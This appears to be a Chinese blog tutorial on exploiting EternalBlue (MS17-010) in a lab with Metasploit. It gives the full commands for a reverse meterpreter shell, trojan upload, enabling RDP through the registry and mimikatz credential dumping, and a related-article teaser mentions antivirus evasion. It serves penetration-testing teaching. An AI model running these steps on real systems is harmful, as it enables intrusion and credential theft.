python调用msfconsole全自动永恒之蓝攻击_MSF之ms17-010永恒之蓝漏洞利用

最新推荐文章于 2024-08-23 16:56:00 发布
最新推荐文章于 2024-08-23 16:56:00 发布
阅读量1k 收藏 3
点赞数
文章标签: python调用msfconsole全自动永恒之蓝攻击
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_29775479/article/details/113678669
版权
本文详细介绍了如何在Kali Linux环境下使用msfconsole工具针对Windows 7 x64系统进行ms17-010永恒之蓝漏洞的扫描和攻击。首先,设置了实验环境,包括被攻击的Windows 7虚拟机和攻击用的Kali Linux虚拟机。然后,通过msfconsole加载辅助扫描模块,确认目标存在MS17-010漏洞。接着,利用exploit模块进行攻击,设置相关参数,并成功获取Meterpreter会话。最后,展示了通过Meterpreter进行系统信息查看、截图、创建文件夹、上传木马以及使用mimikatz获取靶机用户名和密码的过程。
摘要由CSDN通过智能技术生成

MSF之ms17-010永恒之蓝漏洞利用

准备

扫描漏洞

漏洞攻击

准备

实验准备环境:

被攻击机:虚拟机win7x64位系统,其IP为:10.101.2.11(关闭了防火墙)

攻击机:虚拟机kali系统,其IP为:192.168.207.130

攻击工具:kali自带的msfconsole工具

扫描漏洞

在kali终端中输入msfconsole

msf >use auxiliary/scanner/smb/smb_ms17_010(加载扫描exp)

msf >set RHOSTS 10.101.2.11(设置被扫描IP)

msf >run(进行扫描,观察是否存在该漏洞)

8b803c24b70b52d6f8425d8809120e84.png

由上图可知,存在MS17-010漏洞

漏洞攻击

use exploit/windows/smb/ms17_010_eternalblue (加载攻击模块)

set RHOST 10.101.2.11(被攻击机IP)

set LHOST 192.168.207.130(设置本地IP)

set LPORT 4444(设置连接端口)

set payload windows/x64/meterpreter/reverse_tcp(配置回链方式)

b6688e3e4b7f8fad90ed4989dbf3c16c.png

show options(查看配置相关信息)

ca2a21744e4b53a0dde9e5beadf0638e.png

129edd6160a0516b4361740812447863.png

meterpreter >exploit(开始攻击)

986d12fbc1cd6449b1b173b6aede893f.png

攻击成功!

sysinfo爆出系统信息

screenshot截屏,截屏后的图片存放在/root/中

meterpreter >shell,进入靶机cmd

c9a43d69f456a1c1199fa7b0de848ba5.png

此时,可以新建文件夹,然后

meterpreter >upload植入已经写好的木马!

也可以通过使用msf中的mimikatz,来爆出靶机的用户名和密码,以下是其过程:

首先

netstat -an< 查靶机端口开发情况>

880ac2162db61f18b37667746b4b2e16.png

如果没有开启3389端口,可以使用以下命令再cmd中开启:

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

其次

meterpreter > load mimikatz

meterpreter > help

41511aa1c923e8487e131aaf3108ca94.png

meterpreter > msv

ace009b91f11e6c25ec5668aa7002d86.png

meterpreter > ssp

9df0473912f8c7b2613a5df3627d9f86.png

meterpreter > wdigest

8a8ec43b0427bfc61a4ff98e8916e77f.png

meterpreter > kerberos

d8c816b1743d0cf837caddf5db4c359a.png

接下来,就是远程登录靶机

rdesktop 10.101.2.11

346fbfe5f54263dbaab7c62ec6b3ff11.png

成功!

煎饼果子寻秦记
关注
[系统安全] 二十六.WannaCry勒索病毒分析 (2)MS17-010漏洞利用及蠕虫解析
杨秀璋的专栏
03-01 8653
作者前文采用Github资源实现永恒之蓝漏洞加载WannaCry勒索病毒,并实现对Win7文件加密的过程,但过程较为复杂,为什么不直接利用永恒之蓝呢?所以,这篇文章将直接分享MSF利用MS17-010漏洞进行反弹Shell,再上传勒索病毒进行实验复现,并详细讲解WannaCry勒索病毒的原理。基础性文章,希望对您有所帮助。
免杀对抗-MSF\CS-shellcode进行base64编码,python调用执行
m0_62172162的博客
04-25 624
免杀对抗-MSF\CS-shellcode进行base64编码,python调用执行
python调用msfconsole全自动永恒之蓝攻击_使用Metasploit复现永恒之蓝攻击
weixin_39839410的博客
12-22 901
1.Metaspolit介绍Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具,并保持着频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。2.术语渗透攻击(Exploit):指由攻击者或渗透测试者利用一个系统、应用或服务中的安全漏洞,所进行的攻击行为。攻击载荷(Payload):...
python调用msfconsole全自动永恒之蓝攻击_MSF框架实现“永恒之蓝ms17-010的exp攻击...
weixin_39806779的博客
12-22 625
其实我们这里所说的使用MSF 实现 “永恒之蓝”的快速攻击,就是利用Metasploit中针对ms17-101漏洞的攻击载荷进行攻击获取主机控制权限。我这里简单的记录下整个攻击利用所需要的工具准备、利用过程以及后渗透的一些简单内容。本次用到的环境:kali系统.ip地址:192.168.1.106目标靶机为:win7sp1x64系统(关闭防火墙),ip地址:192.168.1.102具体的步骤如下...
Metasploit基础----msfconsole
最新发布
weixin_53736204的博客
08-23 1095
MSF所⽤功能主要可分为这⼏个模块,每个模块都有各⾃的功能领域,形成了渗透测试的流程模块路径:/usr/share/metasploit-framework/modules/漏洞利⽤(exploit):/usr/share/metasploit-framework/modules/exploitspayload模块路径::/usr/share/metasploit-framework/modules/payloads。
python调用msfconsole全自动永恒之蓝攻击_MSFMS17-010永恒之蓝漏洞利用
weixin_36190719的博客
01-14 624
Loading...请注意,本文编写于 392 天前,最后修改于 116 天前,其中某些信息可能已经过时。# MSFMS17-010永恒之蓝漏洞利用1. 准备阶段2. 扫描漏洞3. 漏洞攻击---## 准备阶段**实验准备环境:**攻击机:虚拟机kali系统IP:192.168.207.130被攻击机:虚拟机Win7x64系统IP:10.101.2.11(关闭了防火墙)攻击工具:kali自带Ms...
python调用msfconsole全自动永恒之蓝攻击_永恒之蓝-ETERNALBLUE漏洞MS17-010利用过程
weixin_39604819的博客
12-22 733
本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担事情起因虽然距离上一次WannaCry席卷全球(17-05-12)已经过去一年多了,现在来复现有炒冷饭的嫌疑,但是还是有价值的参考文章:环境准备Kali:192.168.2.6Win7_SP1:192.168.2.7:默认为Administrator账户无密码WinXP_SP3:192.168.2.4使用metasploit搜索模...
永恒之蓝漏洞攻击完整步骤
G_Fu_Q的博客
11-07 9214
kali攻击机 windows2003/windows2008被攻击机 ip:192.168.15.129 1.进行端口扫描 nmap -Pn -sV -T4 ip地址 明白445端口和3389端口open,3389关闭现在无所谓,如果开启以后拿到权限以后就不用做开启3389端口的操作 2.漏洞脚本检测 nmap --script=vuln 192.168.15.129(ip地址) 看出ms17-010漏洞可以攻击 3.msfconsole测试 msfconsole 4.
python调用msfconsole全自动永恒之蓝攻击_永恒之蓝漏洞攻击完整步骤
weixin_42513170的博客
01-14 996
需要设备:kali攻击机windows2003/windows2008被攻击机 ip:192.168.15.1291.进行端口扫描nmap -Pn -sV -T4 ip地址明白445端口和3389端口open,3389关闭现在无所谓,如果开启以后拿到权限以后就不用做开启3389端口的操作2.漏洞脚本检测nmap --script=vuln 192.168.15.129(ip地址)看出ms17-01...
msfconsole执行脚本
公众号shadow sock7
06-24 2744
2350 2017-03-27 03:16 msfconsole -r php-cgi.msf ➜ exploit cat scan_ms17-010.rb [1:45:21] use auxiliary/scanner/smb
windows server 2012主机漏洞-复现-修复
weixin_42881032的博客
09-16 1万+
windows server 2012 目录windows server 2012Microsoft Windows HTTP.sys远程代码执行漏洞 (MS15-034)(CVE-2015-1635)复现Microsoft Windows CredSSP 远程执行代码漏洞(CVE-2018-0886)Microsoft Windows SMB 远程代码执行漏洞(CVE-2017-0148)(MS17-010) Microsoft Windows HTTP.sys远程代码执行漏洞 (MS15-034)(CV
msfconsole 控制台简介
zhdf160916的博客
09-04 1352
Msfconsole提供了一个一体化的集中控制台。通过msfconsole,你可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。Msfconsole还有第三方程序的接口,比如nmap,sqlmap等,可以直接在msfconsole里面使用。 在启动MSF终端之后,可以首先输入help命令列出MSF终端所支持的命令列表,包括核心命令集和后端数据库命令集。对于其中的大部分命令,你可以输入help[COMMAND],进一步查看该命令的使用帮助信息。 一、Msfconso
windows10安装metasploit v6.0
内心不种满鲜花就会长满杂草
03-10 8836
下载地址:https://windows.metasploit.com/ 安装 1. 安装 安装路径不要选择有中文的,我这里本来选择安装到D盘的,但是还是默认安装到c盘了,选择了安装路径一路下一步就行 2. 配置环境变量 如我安装在 c:\metasploit-framework 去我的电脑 -- 属性 --高级系统设置 -- 属性 -- 环境变量; 选择用户变量-path-编辑 新建,将msf的安装路径填进去,6.0的版本需要加上\bin 保存后,在命令行输入...
永恒之黑和永恒之蓝 完整复现流程
Continuejww的博客
09-19 1211
充当攻击机的机器是kali,另外需要关闭防火墙策略。
Ubuntu 安装msfconsole
m_de_g的博客
11-25 3103
Ubuntu 安装msfconsole 1.进入到opt目录下 cd /opt/ 2.下载安装文件 msfupdate.erb sudo wget https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb 3.将文件msfupdate.erb重命名为msfinstall,并且赋予755权限,安装msf su
关于利用kali linux2017.2中MSFCONSOLE 利用MS17-010漏洞发起攻击的坑
dieju8330的博客
04-21 1万+
1、直接使用msfconsole中自带的 “ms17_010_eternalblue”模块    攻击机:192.168.148.134  kali linux2017.2  x64    靶机:192.168.148.137     win7   x32    1.1先用msfconsole的smb模块扫描,看看是否有漏洞 use auxiliary/scanner/smb/smb_ms17_0...
Metasploit安装
小小鱼的博客
02-06 2060
0. 环境 Deepin 15.5 SP2专业版 其他基于Debian的linux发行版也可参考 1. 安装 metaspliot的源码托管在github,链接如下 https://github.com/rapid7/metasploit-framework 官方网站如下: https://metasploit.com/ 可以选择付费版的Metasploit pro或者免费的metasploit-framework进行下载,这里选择下载免费版,下载指导如下: https://github.
metasploit工具的Windows版安装及使用教程
爱国小白帽
03-29 2万+
点击下载 msfconsole
msfconsole 控制台使用和操作
热门推荐
xianjie0318的博客
08-07 2万+
Msfconsole提供了一个一体化的集中控制台。通过msfconsole,你可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。Msfconsole还有第三方程序的接口,比如nmap,sqlmap等,可以直接在msfconsole里面使用。 在启动MSF终端之后,可以首先输入help命令列出MSF终端所支持的命令列表,包括核心命令集和后端数据库命令集。对于...
Python实现MS17-010漏洞利用脚本解析
"这篇资源是关于网络攻防的,特别是针对MS17-010漏洞的Python脚本,适用于网络安全应急演练和CTF比赛。脚本的主要功能是利用永恒之蓝漏洞对目标主机进行攻击,同时展示了如何利用Metasploit框架创建和执行攻击模块。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值